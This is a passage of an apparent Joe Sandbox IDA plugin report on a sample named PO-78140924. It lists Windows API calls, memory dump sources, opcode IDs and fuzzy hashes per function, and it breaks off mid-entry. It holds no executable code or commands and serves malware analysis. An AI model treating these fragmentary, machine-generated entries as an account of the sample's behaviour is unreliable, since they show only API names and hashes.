                                                • Instruction Fuzzy Hash: 8C51B934B047029BDB709F65D891ABDF3E6EF45310F20882FE596CB692DB7298808715
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __write$__getbuf__getptd_noexit__lseeki64
                                                • String ID:
                                                • API String ID: 4182129353-0
                                                • Opcode ID: 61824df4ce69621426fa439a91816e693bd3dc645774f77bc51737f0180928b3
                                                • Instruction ID: c01f8d74bc73c8872d209ea2c6c8f63b77cc08373b548a5989f9b7f8cfceed46
                                                • Opcode Fuzzy Hash: 61824df4ce69621426fa439a91816e693bd3dc645774f77bc51737f0180928b3
                                                • Instruction Fuzzy Hash: 4A41D3B1500B005FD37A9F69C851ABB77D89F41338F14C62DE6BA8B2D2D734E8408B11
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00098910
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: aa3aa4f655bc6dfb1341a5fc352acd3fa317257287672f0bc6cc35bc2d15936c
                                                • Instruction ID: 51eadf5c6037429a5b7438c0c95b8410f10a99575a814f5a92cbdbc75daaab0c
                                                • Opcode Fuzzy Hash: aa3aa4f655bc6dfb1341a5fc352acd3fa317257287672f0bc6cc35bc2d15936c
                                                • Instruction Fuzzy Hash: DA31EF30605208BFEF359A58DC49BBD37A5EB07320F588116FE51E63E1CE31A980BB52
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 0009AB92
                                                • GetWindowRect.USER32(?,?), ref: 0009AC08
                                                • PtInRect.USER32(?,?,?), ref: 0009AC18
                                                • MessageBeep.USER32(00000000), ref: 0009AC89
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: b7baef91abe15843d16b7da17f621adf08b553a2d014a6f14da4c24dca90154f
                                                • Instruction ID: a5ba3e8a9963543a9fe35e2615fdc5a9f4a9d9cd21def3485dd73e96103fb34f
                                                • Opcode Fuzzy Hash: b7baef91abe15843d16b7da17f621adf08b553a2d014a6f14da4c24dca90154f
                                                • Instruction Fuzzy Hash: 8C418CB0B04615EFDF11CF58C884AA97BF5FB4A311F1880AAE814DF261D734E841EB92
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0004637B
                                                • __isleadbyte_l.LIBCMT ref: 000463A9
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 000463D7
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 0004640D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 8566ba1d8185b37aaa50779664465cec6d397514df6c3d71d64e0e52f7667e7d
                                                • Instruction ID: 879aca831346f1a2f60165964991488b32077e934239c1d330a4af29bf72698c
                                                • Opcode Fuzzy Hash: 8566ba1d8185b37aaa50779664465cec6d397514df6c3d71d64e0e52f7667e7d
                                                • Instruction Fuzzy Hash: 5731CEB1600286AFDF218F65C884ABA7BE9FF42351F154079F81487191E732DD50DB95
                                                APIs
                                                • __setmode.LIBCMT ref: 00030B2E
                                                  • Part of subcall function 00015B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00015B8C
                                                  • Part of subcall function 00015B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 00015BB0
                                                • _fprintf.LIBCMT ref: 00030B65
                                                • OutputDebugStringW.KERNEL32(?), ref: 00066111
                                                  • Part of subcall function 00034C1A: _flsall.LIBCMT ref: 00034C33
                                                • __setmode.LIBCMT ref: 00030B9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: 02b83b4d591be5f2a57ccf399d653bfbb3d7e0857e2cea90b9923209f478f2a1
                                                • Instruction ID: dae12e0d1372e35a5c07ada64db0b270d2f29dd187ee4708a6d0cd7a7f42318e
                                                • Opcode Fuzzy Hash: 02b83b4d591be5f2a57ccf399d653bfbb3d7e0857e2cea90b9923209f478f2a1
                                                • Instruction Fuzzy Hash: 01112C32904604BEDB0677B49C47DFEBB6D9F86321F14405AF1046B1D3DF2558854795
                                                APIs
                                                • _free.LIBCMT ref: 00045281
                                                  • Part of subcall function 0003588C: __FF_MSGBANNER.LIBCMT ref: 000358A3
                                                  • Part of subcall function 0003588C: __NMSG_WRITE.LIBCMT ref: 000358AA
                                                  • Part of subcall function 0003588C: RtlAllocateHeap.NTDLL(01450000,00000000,00000001), ref: 000358CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: c51e272b17a7ce2a82d8025d14ce77811c1eb3ca94e53f7627d4bcfbafb27205
                                                • Instruction ID: e0cdebfca4df0df5539b7c0492d7cbb8f5bec1bcf28695f3ce6716170d40e6b5
                                                • Opcode Fuzzy Hash: c51e272b17a7ce2a82d8025d14ce77811c1eb3ca94e53f7627d4bcfbafb27205
                                                • Instruction Fuzzy Hash: B811CD72501B156FDB763F70AD056AE37DCAF06362F204537F904D6153DE788A408755
                                                APIs
                                                • _memset.LIBCMT ref: 00014560
                                                • KillTimer.USER32(?,00000001), ref: 000145B5
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000145C4
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0004D5FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Timer$IconKillNotifyShell__memset
                                                • String ID:
                                                • API String ID: 809998890-0
                                                • Opcode ID: dd07d88a74d50edc4f2a62fc7d354c5db76cc63aefbd5fde243bb48b757c0e97
                                                • Instruction ID: 6231a462e44101f0e8f2291ddc91fc124699c9133e968c1b59cf68f02d9a27a8
                                                • Opcode Fuzzy Hash: dd07d88a74d50edc4f2a62fc7d354c5db76cc63aefbd5fde243bb48b757c0e97
                                                • Instruction Fuzzy Hash: CD21DAB0904B849FE7728B64C855BEBBBEDAF01308F04009FE68996152D7745AC48B51
                                                APIs
                                                • __setmode_nolock.LIBCMT ref: 00049A28
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00049A34
                                                • HeapFree.KERNEL32(00000000), ref: 00049A3B
                                                • __lseeki64_nolock.LIBCMT ref: 00049ABE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess__lseeki64_nolock__setmode_nolock
                                                • String ID:
                                                • API String ID: 2225363126-0
                                                • Opcode ID: b04bd69fc6446a71a1cd7ebf2e19d0b5e95aa7a338ed5d27e48a73dc67a69c2b
                                                • Instruction ID: fb269794b0a57fa1e91ea9779028b4df276c5dfe3d3076b36210bb4bcf87a9ee
                                                • Opcode Fuzzy Hash: b04bd69fc6446a71a1cd7ebf2e19d0b5e95aa7a338ed5d27e48a73dc67a69c2b
                                                • Instruction Fuzzy Hash: 8F11E3B2904500AEDB215ABC8C467BF7AB4EB01360F24037AF524D11E1D7354D6097AA
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00011D73
                                                • GetStockObject.GDI32(00000011), ref: 00011D87
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00011D91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CreateMessageObjectSendStockWindow
                                                • String ID:
                                                • API String ID: 3970641297-0
                                                • Opcode ID: 9e907731ffd068ec460fc344da3f70109af821145cb176013fdd388386cf179b
                                                • Instruction ID: 583030f7ba99cd1c72cf8aa2cd38de321e6e7dace84837ecb1f8d13eb068f7db
                                                • Opcode Fuzzy Hash: 9e907731ffd068ec460fc344da3f70109af821145cb176013fdd388386cf179b
                                                • Instruction Fuzzy Hash: 53116172505619BFEF558F94EC84EEABB69FF09354F040116FA1496120CB75DCA0DBA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction ID: d94d1c810beef6ecac4f7f4c12b40a71def8665965aa3f2a1c2b9135405ff3d8
                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction Fuzzy Hash: 10014CB204814EBBCF526E88DC058EE3F66BF18394B598425FE5C58131D336D9B1AB85
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 0009B318
                                                • ScreenToClient.USER32(?,?), ref: 0009B330
                                                • ScreenToClient.USER32(?,?), ref: 0009B354
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0009B36F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: 7005fa23142f46b49b40495efee6db802cd3198bb517f15308723c162711bc13
                                                • Instruction ID: dae29a5ec3b99f9da13325a526f05c258e4f67a49b4839fa46e96742e40f9aa3
                                                • Opcode Fuzzy Hash: 7005fa23142f46b49b40495efee6db802cd3198bb517f15308723c162711bc13
                                                • Instruction Fuzzy Hash: 391146B5D0020AEFDB41DF98D5849EEBBF5FB08310F108166E914E3620D735AA55DF50
                                                APIs
                                                  • Part of subcall function 000112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0001134D
                                                  • Part of subcall function 000112F3: SelectObject.GDI32(?,00000000), ref: 0001135C
                                                  • Part of subcall function 000112F3: BeginPath.GDI32(?), ref: 00011373
                                                  • Part of subcall function 000112F3: SelectObject.GDI32(?,00000000), ref: 0001139C
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0009BDAA
                                                • LineTo.GDI32(00000000,?,?), ref: 0009BDB7
                                                • EndPath.GDI32(00000000), ref: 0009BDC7
                                                • StrokePath.GDI32(00000000), ref: 0009BDD5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: 888209ca7a3d8d2be5189ad81fc9659a463413c484105abb574667ed6214c68f
                                                • Instruction ID: 76fa8ad802657188c3e70b3f35a7a8d775e5114b61e2f43eb2235c92a983fcc3
                                                • Opcode Fuzzy Hash: 888209ca7a3d8d2be5189ad81fc9659a463413c484105abb574667ed6214c68f
                                                • Instruction Fuzzy Hash: 7BF0823100665ABBEB126F54EC0AFDE3FA9BF45321F184002FE10A14E28B785561DFE5
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00012231
                                                • SetTextColor.GDI32(?,000000FF), ref: 0001223B
                                                • SetBkMode.GDI32(?,00000001), ref: 00012250
                                                • GetStockObject.GDI32(00000005), ref: 00012258
                                                • GetWindowDC.USER32(?,00000000), ref: 0004C003
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0004C010
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0004C029
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0004C042
                                                • GetPixel.GDI32(00000000,?,?), ref: 0004C062
                                                • ReleaseDC.USER32(?,00000000), ref: 0004C06D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                • Opcode ID: af9e2d074611cac045fff27edfb867ecfd434e8f75defb9446c39a72ee34c390
                                                • Instruction ID: dd7a01bceaac38140815614f8bc2e96dbeabad986596aa14ce02e1845ae89afc
                                                • Opcode Fuzzy Hash: af9e2d074611cac045fff27edfb867ecfd434e8f75defb9446c39a72ee34c390
                                                • Instruction Fuzzy Hash: E2E03932104245EAEB615F64EC0DBE83B60FB05332F108377FA79880E1877589A0DB61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __itow_s
                                                • String ID: xb$xb
                                                • API String ID: 3653519197-2744082379
                                                • Opcode ID: 58b865064a8adabf4d618a66a7f60cc80f2e22a0939365c37109d93d8aa43fc0
                                                • Instruction ID: f73cd73906aa48960e9938a2908931d6c72bc9d9a80d39a5b45aef308489cda9
                                                • Opcode Fuzzy Hash: 58b865064a8adabf4d618a66a7f60cc80f2e22a0939365c37109d93d8aa43fc0
                                                • Instruction Fuzzy Hash: 39B14F70A00209EBDB24EF54C891EEEB7F9FF58300F148459F9859B252DB35EA85CB60
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00022AC8
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00022AE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: aa2b37476f3176c8055aeff4cd27bc7b40cab646588dc93826c56705201206b8
                                                • Instruction ID: 3ff37acdf6fc05b0d76f3c37c3550d13193b0f08ee99a91df3b13264fd8c6c10
                                                • Opcode Fuzzy Hash: aa2b37476f3176c8055aeff4cd27bc7b40cab646588dc93826c56705201206b8
                                                • Instruction Fuzzy Hash: 0A514771418744ABE320EF10D896BEBBBF8FF84314F81885DF2D9511A2DB348569CB66
                                                APIs
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00016D0D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00016E5A
                                                  • Part of subcall function 000159CD: _wcscpy.LIBCMT ref: 00015A05
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$_wcscpy
                                                • String ID: Unterminated string
                                                • API String ID: 2959994147-18753482
                                                • Opcode ID: 2056eeebd9bcbf2a8b21c7b3b5292f435f064c7dfc98e5e4117b2ca2f69fab86
                                                • Instruction ID: d624f97d34ad71fb82c5ae568a30cd673ef5c5caba4281ab1c57dd52ef31c2ab
                                                • Opcode Fuzzy Hash: 2056eeebd9bcbf2a8b21c7b3b5292f435f064c7dfc98e5e4117b2ca2f69fab86
                                                • Instruction Fuzzy Hash: EA51AE751083809EC725EB24C881AEFBBE5AF95314F44091DF8C697262DB369A89CB53
                                                APIs
                                                  • Part of subcall function 0001506B: __fread_nolock.LIBCMT ref: 00015089
                                                • _wcscmp.LIBCMT ref: 000798CD
                                                • _wcscmp.LIBCMT ref: 000798E0
                                                Strings
                                                Memory Dump Source
